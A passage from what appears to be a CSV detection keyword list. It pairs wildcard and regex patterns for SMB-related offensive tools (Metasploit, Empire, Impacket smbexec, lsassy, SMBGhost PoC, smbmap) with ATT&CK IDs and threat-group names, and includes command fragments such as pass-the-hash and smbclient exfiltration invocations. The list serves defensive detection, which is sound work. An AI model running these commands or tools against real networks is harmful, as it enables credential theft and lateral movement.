security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_enumusers_domain.*",".{0,1000}smb_enumusers_domain\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_eternalblue*",".{0,1000}smb_eternalblue.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smb_ms17_010_pass*",".{0,1000}smb_ms17_010_pass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_pipename_stager*",".{0,1000}smb_pipename_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*smb_rras_erraticgopher.*",".{0,1000}smb_rras_erraticgopher\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_shadow.*",".{0,1000}smb_shadow\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_shadow.rb*",".{0,1000}smb_shadow\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_stealth.py*",".{0,1000}smb_stealth\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*smb_win.py*",".{0,1000}smb_win\.py.{0,1000}","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","10","1290","349","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z" "*smb1_anonymous_connect_ipc*",".{0,1000}smb1_anonymous_connect_ipc.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smb1_anonymous_login*",".{0,1000}smb1_anonymous_login.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*-smb2support --no-wcf-server --no-smb-server --no-http-server*",".{0,1000}\-smb2support\s\-\-no\-wcf\-server\s\-\-no\-smb\-server\s\-\-no\-http\-server.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*-smb2support --remove-mic --shadow-credentials --shadow-target 
*",".{0,1000}\-smb2support\s\-\-remove\-mic\s\-\-shadow\-credentials\s\-\-shadow\-target\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smbattack.py*",".{0,1000}smbattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*smbattack.py*",".{0,1000}smbattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*smbclient \\\\\\\\*\\\\TRANSFER -N -p * -c \*put *",".{0,1000}smbclient\s\\\\\\\\\\\\\\\\.{0,1000}\\\\\\\\TRANSFER\s\-N\s\-p\s.{0,1000}\s\-c\s\\.{0,1000}put\s.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*smbclient -N -A *\\\\*\\*temp_out.txt*",".{0,1000}smbclient\s\-N\s\-A\s.{0,1000}\\\\\\\\.{0,1000}\\\\.{0,1000}temp_out\.txt.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*smbclient.getFile('C$', 'Windows/CCM/SCNotification.exe.config*",".{0,1000}smbclient\.getFile\(\'C\$\',\s\'Windows\/CCM\/SCNotification\.exe\.config.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script 
that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*smbcrawler*",".{0,1000}smbcrawler.{0,1000}","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement - Collection","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","2","135","13","2024-05-01T16:30:51Z","2021-06-09T19:27:08Z" "*SMBCrunch-master*",".{0,1000}SMBCrunch\-master.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*SMBeagle.exe*",".{0,1000}SMBeagle\.exe.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*SMBeagle.sln*",".{0,1000}SMBeagle\.sln.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*smbeagle_*_linux_amd64.zip*",".{0,1000}smbeagle_.{0,1000}_linux_amd64\.zip.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*smbeagle_*_linux_arm64.zip*",".{0,1000}smbeagle_.{0,1000}_linux_arm64\.zip.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*smbeagle_*_win_x64.zip*",".{0,1000}smbeagle_.{0,1000}_win_x64\.zip.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*smbenum.run*",".{0,1000}smbenum\.run.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*SMBetray*",".{0,1000}SMBetray.{0,1000}","offensive_tool_keyword","SMBetray","PoC to demonstrate the ability of an attacker to intercept and modify insecure SMB connections. as well as compromise some secured SMB connections if credentials are known.","T1557 - T1562 - T1553 - T1213","TA0002 - TA0008 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/quickbreach/SMBetray","1","1","N/A","N/A","4","380","91","2018-08-17T00:45:05Z","2018-08-12T00:38:02Z" "*-SMBExec*",".{0,1000}\-SMBExec.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbexec.py -hashes :*",".{0,1000}smbexec\.py\s\-hashes\s\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smbexec.py -share*",".{0,1000}smbexec\.py\s\-share.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - 
TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smbexec.py*",".{0,1000}smbexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*SMBGhost.pcap*",".{0,1000}SMBGhost\.pcap.{0,1000}","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","654","199","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z" "*smblogin.results.log*",".{0,1000}smblogin\.results\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*smblogin-spray.ps1*",".{0,1000}smblogin\-spray\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*smbmap -*",".{0,1000}smbmap\s\-.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*smbmap -u guest -H *",".{0,1000}smbmap\s\-u\sguest\s\-H\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smbmap.py *",".{0,1000}smbmap\.py\s.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*smbmap.smbmap*",".{0,1000}smbmap\.smbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
